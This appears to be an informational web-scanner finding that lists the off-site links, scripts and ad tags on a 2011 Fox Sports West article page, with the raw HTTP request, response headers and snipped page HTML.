<a href="/12/22/10/Chizik-Micd-Up/landing.html?blockID=378009&feedID=8375"><img src='http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/346414_thumb.jpg' style='padding:0px 2px;' border=0 alt='' /></a>
...[SNIP]...
<a href="/12/22/10/One-on-One-with-Newton/landing.html?blockID=378007&feedID=8375"><img src='http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/346416_thumb.jpg' style='padding:0px 2px;' border=0 alt='' /></a>
...[SNIP]...
<a href="http://www.foxsportssouth.com/pages/video?PID=Q_Bs9uOAXx0RkIMTAoz2bA4qXNBxERvU"><img src='http://wac.2532.edgecastcdn.net/802532/foxsouth/common/medialib/266/346415_thumb.jpg' style='padding:0px 2px;' border=0 alt='' /></a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/01/05/11/Ducks-have-a-different-kind-of-Bair/landing.html?blockID=385641&feedID=7027
" target='_blank'>
Ducks have a different kind of Bair
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/01/04/11/Ducks-Tigers-pick-up-the-practice-pace/landing.html?blockID=384939&feedID=7027
" target='_blank'>
Ducks, Tigers pick up the practice pace
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/01/04/11/Ducks-Tigers-pick-up-the-practice-pace/landing.html?blockID=384940&feedID=7027
" target='_blank'>
Ducks, Tigers pick up the practice pace
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/12/30/10/James-returning-to-Oregon-for-junior-yea/landing.html?blockID=382249&feedID=7027
" target='_blank'>
James returning to Oregon for junior year
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/12/22/10/Oregons-rally-falls-short-in-loss-to-Ida/landing_pac10.html?blockID=377875&feedID=7027
" target='_blank'>
Oregon's rally falls short in loss to Idaho
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/12/17/10/Ducks-halted-by-Virginia/landing_pac10.html?blockID=375675&feedID=7027
" target='_blank'>
Ducks halted by Virginia
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/12/14/10/Ducks-wrap-up-three-day-practice-session/landing.html?blockID=373198&feedID=7027
" target='_blank'>
Ducks wrap up three-day practice session
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/12/14/10/Oregon-cruises-past-Jacksonville-State/landing.html?blockID=372645&feedID=7027
" target='_blank'>
Oregon cruises past Jacksonville State
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/12/12/10/Oregon-blows-out-Willamette-100-67/landing.html?blockID=371448&feedID=7027
" target='_blank'>
Oregon blows out Willamette 100-67
</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.foxsportswest.com/12/04/10/No-1-Oregon-BCS-title-game-bound-after-C/landing.html?blockID=366495&feedID=7027
" target='_blank'>
No. 1 Oregon BCS title game bound after Civil War win
</a>
...[SNIP]...
<div id = "right_newton_239">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<a href='/common/ad_count.php?segmentID=8651' target='_blank'><IMG SRC='http://wac.2532.edgecastcdn.net/802532/foxsouth/common/ad_media/274/adserver_4735.gif' width='88' height='31' border=0></a>
...[SNIP]...
<a href="/pages/video?PID=5XSkiFOpmS0dk6s5cH5gYO7g4DK0bU9Q"><img src="http://images.foxsportscarolinas.com/Prod/Fox_Sports_Net_Carolinas/632/273/bobcats_cheer_011011_100x75.jpg" border="0" class="fsn_vidthumb_img" border=-></a>
...[SNIP]...
<td align="left" valign="top"><a

href="http://www.foxsportsarizona.com"

target="_blank">
FOX Sports Arizona</a><br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a><br>

<a href="http://www.foxsportsflorida.com"

target="_blank">
FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a>
...[SNIP]...
<br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<a href="javascript:void(window.open('http://www.platformic.com'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/266/191108.jpg" alt="" alignment="texttop" border="0" hspace="" vspace=""></a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

5.6. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709 HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=5a10a35d0cd51561897895de30ab37c1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 79224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<link rel="image_src" href="http://www.foxsportswest.com/common/medialib/272/287495_thumb.jpg" />
<link href="http://wac.2532.edgecastcdn.net/802532/foxwest/common/appcss/~1294822698/l=default_lakers_background~landing_witz~menz1215~menz1189~menz1190~stats~horizontal_tabs_600~custom_classes~component_masthead~component_right_lakers~component_footer/g=style/ucdn=1" rel="stylesheet" type="text/css" />

<!--<script language="javascript">
...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/appjs/~1294822698/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS West</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7533.jpg border=0></a>
<div>
<a href='http://www.foxsportsarizona.com' target = '_blank' >FOX Sports Arizona</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FOX Sports Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FOX Sports Detroit</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FOX Sports Florida</a>
<a href='http://www.foxsportshouston.com/' target = '_blank' >FOX Sports Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FOX Sports Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FOX Sports Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FOX Sports North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FOX Sports Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FOX Sports South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FOX Sports Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FOX Sports Tennessee</a>
...[SNIP]...
</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FOX Sports Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/lakers' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7741.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/nba/teamstats.asp?type=schedule&teamno=13' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/nba/teamstats.asp?teamno=13&type=roster' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/nba/teamstats.asp?teamno=13&btnGo=Go&type=totstats' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportswest.stats.com/nba/notes.asp?type=inj' target = '_self' >Injuries</a>
<a href='http://foxsportswest.stats.com/nba/notes.asp?type=trans' target = '_self' >Transactions</a>
...[SNIP]...
<a href='/pages/dodgers' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7740.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?report=schedule&tm=19' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=19&report=roster' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=19&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=19&report=injuries' target = '_self' >Injuries</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=19&report=trans' target = '_self' >Transactions</a>
...[SNIP]...
<a href='/pages/angels' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7739.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?report=schedule&tm=3' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=03&report=roster' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=03&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=03&report=injuries' target = '_self' >Injuries</a>
<a href='http://foxsportswest.stats.com/mlb/teamreports.asp?tm=03&report=trans' target = '_self' >Transactions</a>
...[SNIP]...
<a href='/pages/kings' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7537.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?type=schedule&teamno=08' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=08&type=roster' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=08&type=stats' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=08&type=injuries' target = '_self' >Injuries</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=08&type=transactions' target = '_self' >Transactions</a>
...[SNIP]...
<a href='/pages/clippers' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/15257.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/nba/teamstats.asp?type=schedule&teamno=12' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/nba/teamstats.asp?teamno=12&type=roster' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/nba/teamstats.asp?teamno=12&btnGo=Go&type=totstats' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportswest.stats.com/nba/notes.asp?type=inj' target = '_self' >Injuries</a>
<a href='http://foxsportswest.stats.com/nba/notes.asp?type=trans' target = '_self' >Transactions</a>
...[SNIP]...
<a href='/pages/ducks' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7536.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?type=schedule&teamno=25' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=25&type=roster' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=25&type=stats' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=25&type=injuries' target = '_self' >Injuries</a>
<a href='http://foxsportswest.stats.com/nhl/teamstats.asp?teamno=25&type=transactions' target = '_self' >Transactions</a>
...[SNIP]...
<a href='/pages/usc' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7744.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/cfb/teamstats.asp?team=62&report=teamhome' target = '_self' >Football Home</a>
<a href='http://foxsportswest.stats.com/cbk/teamstats.asp?yr=2010&report=schedule&team=0609' target = '_self' >M Basketball Schedule</a>
<a href='http://foxsportswest.stats.com/cbk/teamstats.asp?team=609&report=roster' target = '_self' >M Basketball Roster</a>
<a href='http://foxsportswest.stats.com/cbk/teamstats.asp?team=609&report=stats' target = '_self' >M Basketball Stats</a>
<a href='http://foxsportswest.stats.com/wcbk/schedules.asp?team=0609&cat=schedules' target = '_self' >W Basketball Schedule</a>
<a href='http://foxsportswest.stats.com/wcbk/rosters.asp?team=0609' target = '_self' >W Basketball Roster</a>
<a href='http://foxsportswest.stats.com/wcbk/stats.asp?team=0609&cat=teamstats' target = '_self' >W Basketball Stats</a>
...[SNIP]...
<a href='/pages/ucla' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7743.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/cfb/teamstats.asp?team=64&report=teamhome' target = '_self' >Football Home</a>
<a href='http://foxsportswest.stats.com/cbk/teamstats.asp?yr=2010&report=schedule&team=0606' target = '_self' >M Basketball Schedule</a>
<a href='http://foxsportswest.stats.com/cbk/teamstats.asp?team=606&report=roster' target = '_self' >M Basketball Roster</a>
<a href='http://foxsportswest.stats.com/cbk/teamstats.asp?team=606&report=stats' target = '_self' >M Basketball Stats</a>
<a href='http://foxsportswest.stats.com/wcbk/schedules.asp?team=0606&cat=schedules' target = '_self' >W Basketball Schedule</a>
<a href='http://foxsportswest.stats.com/wcbk/rosters.asp?team=0606&cat=schedules' target = '_self' >W Basketball Roster</a>
<a href='http://foxsportswest.stats.com/wcbk/stats.asp?team=0606&cat=teamstats' target = '_self' >W Basketball Stats</a>
...[SNIP]...
<a href='/pages/galaxy' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/7746.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/mls/schedules.asp?team=7' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/mls/rosters.asp?team=7' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/mls/teamstats.asp?team=7' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/mls/standings.asp' target = '_self' >Standings</a>
...[SNIP]...
<a href='/pages/chivas' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/11769.jpg border=0></a>
<div>
<a href='http://foxsportswest.stats.com/mls/schedules.asp?team=17' target = '_self' >Schedule</a>
<a href='http://foxsportswest.stats.com/mls/rosters.asp?team=17' target = '_self' >Roster</a>
<a href='http://foxsportswest.stats.com/mls/teamstats.asp?team=17' target = '_self' >Stats</a>
<a href='http://foxsportswest.stats.com/mls/standings.asp' target = '_self' >Standings</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxwest/menu_images/11770.jpg border=0></a>
...[SNIP]...
<a href="/pages/main"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<div id = "masthead_199">

<a href="http://www.foxsports.com" target="new">FOXSPORTS.COM</a>
...[SNIP]...
</a>&nbsp; |&nbsp; <a href="http://www.scout.com" target="new">SCOUT</a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=728x90;ord=1294849854?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.west/landing_witz;tile=3;sz=728x90;ord=1294849854?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.west/landing_witz;tile=3;sz=728x90;ord=1294849854?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
ize:11px
height:24px;
line-height:24px;
padding:5px 5px 10px 5px;
background:#fffffff none repeat scroll 0%;
overflow:hidden;
border-style:solid;
border-width:1px 0px 0px 0px;
border-color:#DC3326;;'>
<iframe src="http://facebook.com/plugins/like.php?href=http%3A%2F%2Fwac.2532.edgecastcdn.net/802532/foxwest%2F01%2F12%2F11%2FCavs-roster-full-of-no-names-with-no-gam%2Flanding_witz.html%3FblockID%3D389566%26feedID%3D3709%26&amp;layout=button_count&amp;show-faces=true&amp;width=75&amp;action=like&amp;colorscheme=light" scrolling="no" allowtransparency="true" frameborder="0" style="border:none; width:75px;height:20px;"></iframe>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_389566">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566^feedID=3709^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=389566&feedID=3709&" target=_blank rel="nofollow">
...[SNIP]...
/sharer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('Cavs roster full of no-names with no game') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportswest.com/common/dynrss/dynrss_3709_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
<div style="text-align: left;"><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat"><div><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/264/327856.JPG" alt="HeatRepeat_20101026121924_0_0.JPG" alignment="none" border="0" vspace="" hspace=""></div>
...[SNIP]...
<br><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat">Visit
Heat or 3Peat
Central</a>
...[SNIP]...
<!- END SINGLE BAR -->
<IMG border=0 alt="LAL-300banner 011411 D.jpg" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/medialib/272/350842.jpg" alignment="left"></div>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=300x250;ord=1294849854?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.west/landing_witz;tile=3;sz=300x250;ord=1294849854?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.west/landing_witz;tile=3;sz=300x250;ord=1294849854?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(10)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(3)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(4)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://foxsportswest.stats.com/nhl/recap.asp?g=2011011008&home=8&vis=21">Kings outlasted by Maple Leafs 3-2</a>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://foxsportswest.stats.com/cfb/recap.asp?g=201101100075&home=75&vis=60">BCS title belongs to Auburn </a>
...[SNIP]...
<a href='/common/ad_count.php?segmentID=8662' target='_blank'><IMG SRC='http://wac.2532.edgecastcdn.net/802532/foxwest/common/ad_media/274/adserver_4735.gif' width='88' height='31' border=0></a>
...[SNIP]...
<a href="/pages/video?PID=RM1zy13PmarOM7P_2stO8TF3hHdi5Pak"><img src="http://images.foxsportsarizona.com/Prod/Fox_Sports_Net_Arizona/632/443/oregon_coach_011011_100x75.jpg" border="0" class="fsn_vidthumb_img" border=-></a>
...[SNIP]...
<td align="left" valign="top"><a

href="http://www.foxsportsarizona.com"

target="_blank">
FOX Sports Arizona</a><br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a><br>

<a href="http://www.foxsportsflorida.com"

target="_blank">
FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a>
...[SNIP]...
<br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

